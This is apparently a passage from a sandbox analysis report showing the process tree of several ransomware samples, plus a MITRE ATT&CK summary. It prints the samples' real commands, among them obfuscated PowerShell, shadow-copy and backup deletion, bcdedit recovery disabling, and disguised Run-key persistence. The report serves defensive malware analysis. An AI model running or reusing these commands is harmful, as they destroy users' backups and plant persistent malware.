                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Modifies Control Panel
                          • Modifies registry class
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:6608
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
                            4⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious use of AdjustPrivilegeToken
                            PID:7348
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\Desktop\00416\TR4C0D~1.EXE >> NUL
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:8668
                        • C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Gen.nse-25adae704fe3ee1591e751d24dfff1b17f834fac79fd9f7a7495b4753f2a1006.exe
                          Trojan-Ransom.Win32.Gen.nse-25adae704fe3ee1591e751d24dfff1b17f834fac79fd9f7a7495b4753f2a1006.exe
                          3⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:5584
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://invite.gg/inverse
                            4⤵
                              PID:6680
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9651146f8,0x7ff965114708,0x7ff965114718
                                5⤵
                                  PID:6700
                            • C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Gen.zjq-7727333265591e7b27b575eacbf9d55dd5967b6c1ad6d9bb9255d158957294ad.exe
                              Trojan-Ransom.Win32.Gen.zjq-7727333265591e7b27b575eacbf9d55dd5967b6c1ad6d9bb9255d158957294ad.exe
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:5224
                              • C:\Windows\system32\cmd.exe
                                "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\194B.tmp\194C.tmp\194D.bat C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Gen.zjq-7727333265591e7b27b575eacbf9d55dd5967b6c1ad6d9bb9255d158957294ad.exe"
                                4⤵
                                  PID:4048
                              • C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Hades.g-0dfcf4d5f66310de87c2e422d7804e66279fe3e3cd6a27723225aecf214e9b00.exe
                                Trojan-Ransom.Win32.Hades.g-0dfcf4d5f66310de87c2e422d7804e66279fe3e3cd6a27723225aecf214e9b00.exe
                                3⤵
                                • Executes dropped EXE
                                PID:5620
                                • C:\Users\Admin\AppData\Roaming\MappingsMtf\Discovery
                                  C:\Users\Admin\AppData\Roaming\MappingsMtf\Discovery /go
                                  4⤵
                                    PID:3204
                                    • C:\Windows\SYSTEM32\cmd.exe
                                      cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\MappingsMtf\Discovery" & del "C:\Users\Admin\AppData\Roaming\MappingsMtf\Discovery" & rd "C:\Users\Admin\AppData\Roaming\MappingsMtf\"
                                      5⤵
                                      • System Network Configuration Discovery: Internet Connection Discovery
                                      PID:696
                                      • C:\Windows\system32\waitfor.exe
                                        waitfor /t 10 pause /d y
                                        6⤵
                                          PID:7856
                                        • C:\Windows\system32\attrib.exe
                                          attrib -h "C:\Users\Admin\AppData\Roaming\MappingsMtf\Discovery"
                                          6⤵
                                          • System Network Configuration Discovery: Internet Connection Discovery
                                          • Views/modifies file attributes
                                          PID:8608
                                    • C:\Windows\SYSTEM32\cmd.exe
                                      cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Hades.g-0dfcf4d5f66310de87c2e422d7804e66279fe3e3cd6a27723225aecf214e9b00.exe" & del "C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Hades.g-0dfcf4d5f66310de87c2e422d7804e66279fe3e3cd6a27723225aecf214e9b00.exe" & rd "C:\Users\Admin\Desktop\00416\"
                                      4⤵
                                        PID:7712
                                        • C:\Windows\system32\waitfor.exe
                                          waitfor /t 10 pause /d y
                                          5⤵
                                            PID:6884
                                          • C:\Windows\system32\attrib.exe
                                            attrib -h "C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Hades.g-0dfcf4d5f66310de87c2e422d7804e66279fe3e3cd6a27723225aecf214e9b00.exe"
                                            5⤵
                                            • Views/modifies file attributes
                                            PID:7572
                                      • C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exe
                                        Trojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exe
                                        3⤵
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:1428
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exe" "C:\Users\Admin\AppData\Roaming\osk.exe"
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:7360
                                        • C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exe
                                          "C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exe" runas
                                          4⤵
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          • Access Token Manipulation: Create Process with Token
                                          • System Location Discovery: System Language Discovery
                                          PID:6508
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\Desktop\00416\Trojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exe" "C:\Users\Admin\AppData\Roaming\osk.exe"
                                            5⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:7152
                                          • C:\Users\Admin\AppData\Roaming\osk.exe
                                            "C:\Users\Admin\AppData\Roaming\osk.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            • Maps connected drives based on registry
                                            • Drops file in Program Files directory
                                            • System Location Discovery: System Language Discovery
                                            PID:6316
                                            • C:\Windows\SysWOW64\mshta.exe
                                              mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\NCddWiA',i);}catch(e){}},10);"
                                              6⤵
                                              • Adds Run key to start application
                                              • System Location Discovery: System Language Discovery
                                              PID:1884
                                            • C:\Users\Admin\AppData\Local\Temp\$TMP$001.exe
                                              C:\Users\Admin\AppData\Local\Temp\$TMP$001.exe
                                              6⤵
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              PID:4356
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\$TMP$001.exe" "%APPDATA%\winupas.exe" & reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Update Assistant" /t REG_SZ /F /D "\"%APPDATA%\winupas.exe\" *" & "%APPDATA%\winupas.exe" *
                                                7⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:9032
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Update Assistant" /t REG_SZ /F /D "\"C:\Users\Admin\AppData\Roaming\winupas.exe\" *"
                                                  8⤵
                                                  • Adds Run key to start application
                                                  • System Location Discovery: System Language Discovery
                                                  PID:8424
                                                • C:\Users\Admin\AppData\Roaming\winupas.exe
                                                  "C:\Users\Admin\AppData\Roaming\winupas.exe" *
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  PID:8272
                                            • C:\Windows\SysWOW64\mshta.exe
                                              mshta.exe "javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\JPWW[\\ZPJOL'));close();"
                                              6⤵
                                                PID:5420
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
                                                  7⤵
                                                    PID:6636
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE
                                                    7⤵
                                                      PID:60
                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                        wmic SHADOWCOPY DELETE
                                                        8⤵
                                                          PID:6288
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c vssadmin Delete Shadows /All /Quiet
                                                        7⤵
                                                          PID:8444
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
                                                          7⤵
                                                            PID:1840
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              8⤵
                                                                PID:8424
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                              7⤵
                                                                PID:8720
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c start /max notepad.exe "C:\Users\Admin\Instructions for recovery FILES.TXT"
                                                              6⤵
                                                                PID:8292
                                                                • C:\Windows\SysWOW64\notepad.exe
                                                                  notepad.exe "C:\Users\Admin\Instructions for recovery FILES.TXT"
                                                                  7⤵
                                                                    PID:5976
                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                  mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('osk.exe');close()}catch(e){}},10);"
                                                                  6⤵
                                                                    PID:9036
                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                  mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('Trojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exe');close()}catch(e){}},10);"
                                                                  5⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:5804
                                                            • C:\Users\Admin\Desktop\00416\UDS-Trojan-Ransom.Win32.Foreign-5b0e1cb6a13ca4074731d087948d4b59c670c33c857fdf29472080f50453dbef.exe
                                                              UDS-Trojan-Ransom.Win32.Foreign-5b0e1cb6a13ca4074731d087948d4b59c670c33c857fdf29472080f50453dbef.exe
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:5060
                                                            • C:\Users\Admin\Desktop\00416\VHO-Trojan-Ransom.Win32.Blocker.gen-fd2fffd46e1c59e974719fa411cebe4f9e0f2177d489a93158ece32eb96afe28.exe
                                                              VHO-Trojan-Ransom.Win32.Blocker.gen-fd2fffd46e1c59e974719fa411cebe4f9e0f2177d489a93158ece32eb96afe28.exe
                                                              3⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • System Location Discovery: System Language Discovery
                                                              • Modifies Internet Explorer start page
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:9012
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.2345.com/?k563039790
                                                                4⤵
                                                                • Enumerates system info in registry
                                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                PID:5732
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9651146f8,0x7ff965114708,0x7ff965114718
                                                                  5⤵
                                                                    PID:6140
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,511034170081743031,13021024648599962349,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:2
                                                                    5⤵
                                                                      PID:8624
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2216,511034170081743031,13021024648599962349,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
                                                                      5⤵
                                                                        PID:3660
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2216,511034170081743031,13021024648599962349,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:8
                                                                        5⤵
                                                                          PID:3436
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,511034170081743031,13021024648599962349,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
                                                                          5⤵
                                                                            PID:7868
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,511034170081743031,13021024648599962349,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1
                                                                            5⤵
                                                                              PID:1888
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,511034170081743031,13021024648599962349,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1
                                                                              5⤵
                                                                                PID:6064
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,511034170081743031,13021024648599962349,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
                                                                                5⤵
                                                                                  PID:1640
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2216,511034170081743031,13021024648599962349,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5352 /prefetch:8
                                                                                  5⤵
                                                                                    PID:5940
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2216,511034170081743031,13021024648599962349,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5352 /prefetch:8
                                                                                    5⤵
                                                                                      PID:2740
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,511034170081743031,13021024648599962349,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1
                                                                                      5⤵
                                                                                        PID:2152
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,511034170081743031,13021024648599962349,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:1
                                                                                        5⤵
                                                                                          PID:8888
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,511034170081743031,13021024648599962349,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
                                                                                          5⤵
                                                                                            PID:7336
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,511034170081743031,13021024648599962349,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:1
                                                                                            5⤵
                                                                                              PID:7444
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,511034170081743031,13021024648599962349,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3352 /prefetch:2
                                                                                              5⤵
                                                                                                PID:7636
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 9012 -s 996
                                                                                              4⤵
                                                                                              • Program crash
                                                                                              PID:5132
                                                                                          • C:\Users\Admin\Desktop\00416\VHO-Trojan-Ransom.Win32.Convagent.gen-a6955b8539e4bf51bc4c0b9dd9c7c410cf1b8892741401409ec2c685db104ccc.exe
                                                                                            VHO-Trojan-Ransom.Win32.Convagent.gen-a6955b8539e4bf51bc4c0b9dd9c7c410cf1b8892741401409ec2c685db104ccc.exe
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:5412
                                                                                          • C:\Users\Admin\Desktop\00416\VHO-Trojan-Ransom.Win32.Foreign.gen-9f43b7e551446a58daff45fbbf75f884f0b5b16c095f17c92bb5e27344556784.exe
                                                                                            VHO-Trojan-Ransom.Win32.Foreign.gen-9f43b7e551446a58daff45fbbf75f884f0b5b16c095f17c92bb5e27344556784.exe
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                            PID:5576
                                                                                          • C:\Users\Admin\Desktop\00416\VHO-Trojan-Ransom.Win32.Gen.gen-1d7671a21350324eff8fe60dd3f02e984097a9d54266492c0409a5ffd8c555cc.exe
                                                                                            VHO-Trojan-Ransom.Win32.Gen.gen-1d7671a21350324eff8fe60dd3f02e984097a9d54266492c0409a5ffd8c555cc.exe
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:2796
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\61CD.tmp\61CE.tmp\61CF.bat C:\Users\Admin\Desktop\00416\VHO-Trojan-Ransom.Win32.Gen.gen-1d7671a21350324eff8fe60dd3f02e984097a9d54266492c0409a5ffd8c555cc.exe"
                                                                                              4⤵
                                                                                                PID:1584
                                                                                                • C:\Windows\system32\mode.com
                                                                                                  mode 160,40
                                                                                                  5⤵
                                                                                                    PID:5932
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
                                                                                                    5⤵
                                                                                                      PID:6044
                                                                                                • C:\Users\Admin\Desktop\00416\VHO-Trojan-Ransom.Win32.PornoBlocker.gen-7882a3a461e5ab50fc62584efdc1dd4c2beb8c7af9ea7ee98085b68320ebf7fc.exe
                                                                                                  VHO-Trojan-Ransom.Win32.PornoBlocker.gen-7882a3a461e5ab50fc62584efdc1dd4c2beb8c7af9ea7ee98085b68320ebf7fc.exe
                                                                                                  3⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:5676
                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
                                                                                                    4⤵
                                                                                                    • Checks computer location settings
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:8840
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1.bat" "
                                                                                                      5⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:7428
                                                                                            • C:\Windows\explorer.exe
                                                                                              explorer.exe
                                                                                              1⤵
                                                                                                PID:7964
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
                                                                                                1⤵
                                                                                                  PID:8368
                                                                                                • C:\Windows\system32\vssvc.exe
                                                                                                  C:\Windows\system32\vssvc.exe
                                                                                                  1⤵
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:920
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                  1⤵
                                                                                                    PID:5224
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1872 -ip 1872
                                                                                                      2⤵
                                                                                                        PID:6896
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 9012 -ip 9012
                                                                                                        2⤵
                                                                                                          PID:7504
                                                                                                      • C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE
                                                                                                        "C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE"
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:7600
                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:8460
                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:5968
                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                            1⤵
                                                                                                              PID:6608
                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                              1⤵
                                                                                                                PID:5932
                                                                                                              • C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                1⤵
                                                                                                                  PID:8884
                                                                                                                • C:\Windows\system32\vssvc.exe
                                                                                                                  C:\Windows\system32\vssvc.exe
                                                                                                                  1⤵
                                                                                                                    PID:1316

                                                                                                                  Network

                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                  Reconnaissance

                                                                                                                  Resource Development

                                                                                                                  Initial Access

                                                                                                                  Execution

                                                                                                                  Command and Scripting Interpreter

                                                                                                                  1
                                                                                                                  T1059

                                                                                                                  PowerShell

                                                                                                                  1
                                                                                                                  T1059.001

                                                                                                                  System Services

                                                                                                                  1
                                                                                                                  T1569

                                                                                                                  Service Execution

                                                                                                                  1
                                                                                                                  T1569.002

                                                                                                                  Windows Management Instrumentation

                                                                                                                  1
                                                                                                                  T1047

                                                                                                                  Persistence

                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                  2
                                                                                                                  T1547

                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                  2
                                                                                                                  T1547.001

                                                                                                                  Create or Modify System Process

                                                                                                                  2
                                                                                                                  T1543

                                                                                                                  Windows Service

                                                                                                                  2
                                                                                                                  T1543.003

                                                                                                                  Event Triggered Execution

                                                                                                                  2
                                                                                                                  T1546

                                                                                                                  Accessibility Features

                                                                                                                  1
                                                                                                                  T1546.008

                                                                                                                  Component Object Model Hijacking

                                                                                                                  1
                                                                                                                  T1546.015

                                                                                                                  Privilege Escalation

                                                                                                                  Access Token Manipulation

                                                                                                                  1
                                                                                                                  T1134

                                                                                                                  Create Process with Token

                                                                                                                  1
                                                                                                                  T1134.002

                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                  2
                                                                                                                  T1547

                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                  2
                                                                                                                  T1547.001

                                                                                                                  Create or Modify System Process

                                                                                                                  2
                                                                                                                  T1543

                                                                                                                  Windows Service

                                                                                                                  2
                                                                                                                  T1543.003

                                                                                                                  Event Triggered Execution

                                                                                                                  2
                                                                                                                  T1546

                                                                                                                  Accessibility Features

                                                                                                                  1
                                                                                                                  T1546.008

                                                                                                                  Component Object Model Hijacking

                                                                                                                  1
                                                                                                                  T1546.015

                                                                                                                  Defense Evasion

                                                                                                                  Access Token Manipulation

                                                                                                                  1
                                                                                                                  T1134

                                                                                                                  Create Process with Token

                                                                                                                  1
                                                                                                                  T1134.002

